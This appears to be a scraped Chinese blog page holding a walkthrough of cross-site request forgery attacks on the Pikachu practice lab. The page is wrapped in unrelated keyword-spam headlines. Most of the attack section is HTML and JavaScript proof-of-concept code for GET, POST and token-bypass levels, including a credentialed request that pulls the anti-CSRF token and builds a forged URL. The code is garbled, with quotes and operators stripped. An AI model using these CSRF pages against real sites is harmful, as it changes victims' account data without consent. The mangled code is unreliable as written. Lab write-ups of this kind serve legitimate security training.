当前位置: 首页 > news >正文

建设网站的心得网站建设属于什么类的采购

建设网站的心得,网站建设属于什么类的采购,制作网站要找什么公司,东莞网站推广外包pikachu-csrf实例 get级别 这里需要同时修改性别、手机、住址、邮箱。 写一个简单的html文件#xff0c;里面伪装修改密码的文字#xff0c;代码如下#xff1a; htmlbodya hrefhttp://pikachu:7002/vul/csrf/csrfget/csrf_get_edit.php?sex…pikachu-csrf实例 get级别 这里需要同时修改性别、手机、住址、邮箱。 写一个简单的html文件里面伪装修改密码的文字代码如下 htmlbodya hrefhttp://pikachu:7002/vul/csrf/csrfget/csrf_get_edit.php?sex3phonenum2add2email3submitsubmitpikachu-csrf-get/a/body /html点击pikachu-csrf-get文字后跳转到pikachu的csrf(get)界面展示修改后的界面。 post级别 这里post请求需要通过表单提交。 写一个简单的html文件里面伪装修改密码的文字代码如下 htmlbodya hrefhttp://pikachu:7002/vul/csrf/csrfget/csrf_get_edit.php?sex3phonenum2add2email3submitsubmitpikachu-csrf-get/a/brform methodpost actionhttp://pikachu:7002/vul/csrf/csrfpost/csrf_post_edit.phpinput idsex typetext namesex value5 /input idphonenum typetext namephonenum value5 /input idadd typetext nameadd value5 /input idemail typetext nameemail value5 /input idpostsubmit typesubmit namesubmit valuepikachu-csrf-post //form/body/html点击pikachu-csrf-post文字后跳转到pikachu的csrf(post)界面展示修改后的界面。 token级别 这里get请求token。 写一个简单的html文件里面get请求拼接token代码如下 htmlbodya hrefhttp://pikachu:7002/vul/csrf/csrfget/csrf_get_edit.php?sex3phonenum2add2email3submitsubmitpikachu-csrf-get/a/brform methodpost actionhttp://pikachu:7002/vul/csrf/csrfpost/csrf_post_edit.phpinput idsex typetext namesex value5 /input idphonenum typetext namephonenum value5 /input idadd typetext nameadd value5 /input idemail typetext nameemail value5 /input idpostsubmit typesubmit namesubmit valuepikachu-csrf-post //form/bra hrefjavascript:void(0); onclickinitJS()pikachu-csrf-token/a/bodyscript function initJS(){var theUrl http://pikachu:7002/vul/csrf/csrftoken/token_get_edit.php;if(window.XMLHttpRequest) {xmlhttp new XMLHttpRequest();}else{xmlhttp new ActiveXObject(Microsoft.XMLHTTP);}var count 0;xmlhttp.withCredentials true;xmlhttp.onreadystatechangefunction(){if(xmlhttp.readyState 4 xmlhttp.status200){var text xmlhttp.responseText;// 创建一个临时的 div 元素并将 HTML 字符串设置为其 innerHTML var tempDiv document.createElement(div); tempDiv.innerHTML text; // 从临时 div 中查找具有 name 属性为 token 的输入元素 var tokenInput tempDiv.querySelector(input[nametoken]); var token tokenInput.value; console.log(Token Value:, token); // 在控制台输出 token 的值 console.log(count,count);var new_url http://pikachu:7002/vul/csrf/csrftoken/token_get_edit.php?sex7phonenum7add7email7tokentokensubmitsubmit;console.log(newurl,new_url); }};xmlhttp.open(GET,theUrl,false);xmlhttp.send();}/script/html点击pikachu-csrf-token文字后在控制台中查看newurl并复制下来输入到浏览器中。 刷新csrf token展示了修改后的信息。 破解成功
http://www.pierceye.com/news/163982/

相关文章:

  • 湛江网站制作多少钱建网站程序工具
  • 四川省乐山市建设银行网站一级门户网站建设费用
  • 六安网站制作哪里有网站备案网站
  • 石家庄手机网站建设公司wordpress媒体库难用
  • wordpress上传完了周口seo 网站
  • 广州网站建设技术方案建设宠物网站的目的
  • 邢台网站维护网络营销推广方法及分类
  • 做网站买过域名之后门户网站建设公司报价
  • 广告网站设计公司好吗重庆在线app
  • 深圳网站建设哪家公司便宜网站一般用什么语言做
  • 网站平台建设所需开发工具成都麦卡网络做网站开发怎么样
  • 可以做网站的电脑软件济南网页设计
  • 推广网站制作网站建设代理怎么做
  • 做网站页面遇到的问题网站规划设计的步骤
  • 请人做网站要多少钱做视频网站代码
  • 厦门建设网站的公司苏州外贸公司网站建设流程图
  • php做的静态网站怎么加密seo是什么工作
  • 溧水网站建设建立什么指标体系和评价程序规范
  • 怎样向顾客电销网站建设一号网站建设
  • 平陆县做网站移动网站开发的视频下载
  • 百度做个公司网站要多少钱区块链开源平台
  • 企业网站建设建设网站指定关键词优化
  • 找兼职做网站的哪里找建筑学院app网站
  • 电影采集网站建设松门建设规划局网站
  • 多用户自助建站系统wordpress修改生效
  • 免费学编程国内网站珠海网站建设 科速
  • 网站制作公司兴田德润简介福州公司做网站
  • 织梦网站图标路径上海网站推广
  • 网站亚马逊商城
  • h5企业模板网站模板江苏专业网站建设公司电话